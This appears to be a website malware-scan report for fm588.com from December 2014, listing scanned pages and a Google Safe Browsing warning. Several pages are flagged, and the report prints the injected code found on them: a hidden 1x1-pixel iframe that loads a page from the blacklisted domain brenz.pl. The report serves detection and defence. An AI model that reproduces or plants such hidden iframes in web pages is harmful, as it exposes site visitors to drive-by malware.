Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fm588.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fm588.com/ | 200 OK Content-Length: 54251 Content-Type: text/html | clean |
http://fm588.com/index.asp | 200 OK Content-Length: 89010 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: brenz.pl ...[4527 bytes skipped]... 2"></script> <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fbf0d451ff8afd06411fb8cc66c665527' type='text/javascript'%3E%3C/script%3E")); </script> <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1></iframe> </body> </html> Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://s31.cnzz.com/stat.php?id=992887&web_id=992887&show=pic | 200 OK Content-Length: 10073 Content-Type: application/javascript | clean |
http://s41.cnzz.com/stat.php?id=1697042&web_id=1697042&show=pic | 200 OK Content-Length: 10074 Content-Type: application/javascript | clean |
http://fm588.com/jian.asp?classid=2 | 200 OK Content-Length: 17674 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: brenz.pl ...[4564 bytes skipped]... 2"></script> <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fbf0d451ff8afd06411fb8cc66c665527' type='text/javascript'%3E%3C/script%3E")); </script> <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1></iframe> </body> </html> Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://fm588.com/news.asp?classid=5 | 200 OK Content-Length: 16766 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: brenz.pl ...[4560 bytes skipped]... 2"></script> <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fbf0d451ff8afd06411fb8cc66c665527' type='text/javascript'%3E%3C/script%3E")); </script> <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1></iframe> </body> </html> Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://fm588.com/yanshi.asp | 200 OK Content-Length: 9187 Content-Type: text/html | clean |
http://fm588.com/cp.asp | 200 OK Content-Length: 41431 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: brenz.pl ...[4564 bytes skipped]... 2"></script> <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fbf0d451ff8afd06411fb8cc66c665527' type='text/javascript'%3E%3C/script%3E")); </script> <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1></iframe> </body> </html> Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://fm588.com/kefu.asp | 200 OK Content-Length: 2375 Content-Type: text/html | clean |
http://fm588.com/zhifu.asp | 200 OK Content-Length: 25795 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: brenz.pl ...[4564 bytes skipped]... 2"></script> <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fbf0d451ff8afd06411fb8cc66c665527' type='text/javascript'%3E%3C/script%3E")); </script> <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1></iframe> </body> </html> Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://fm588.com/bbs/index.asp | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://fm588.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://fm588.com/leadbbs/Default.asp | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://fm588.com/lianxi.asp | 200 OK Content-Length: 18540 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: brenz.pl ...[4564 bytes skipped]... 2"></script> <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fbf0d451ff8afd06411fb8cc66c665527' type='text/javascript'%3E%3C/script%3E")); </script> <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1></iframe> </body> </html> Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://fm588.com/cp.asp?ClassID=58&id= | 200 OK Content-Length: 22233 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: brenz.pl ...[4564 bytes skipped]... 2"></script> <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fbf0d451ff8afd06411fb8cc66c665527' type='text/javascript'%3E%3C/script%3E")); </script> <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1></iframe> </body> </html> Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fm588.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 22 Dec 2014 20:46:42 GMT
Server: Microsoft-IIS/6.0
Content-Length: 89010
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCSADBT=KINDCJDANJANEKPJFIJEJGOF; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: ASP.NET
...89010 bytes of data.
GET / HTTP/1.1
Host: fm588.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 22 Dec 2014 20:46:42 GMT
Server: Microsoft-IIS/6.0
Content-Length: 89010
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCSADBT=KINDCJDANJANEKPJFIJEJGOF; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: ASP.NET
...89010 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fm588.com
Referer: http://www.google.com/search?q=fm588.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fm588.com
Referer: http://www.google.com/search?q=fm588.com
Result:
The result is similar to the first query. There are no suspicious redirects found.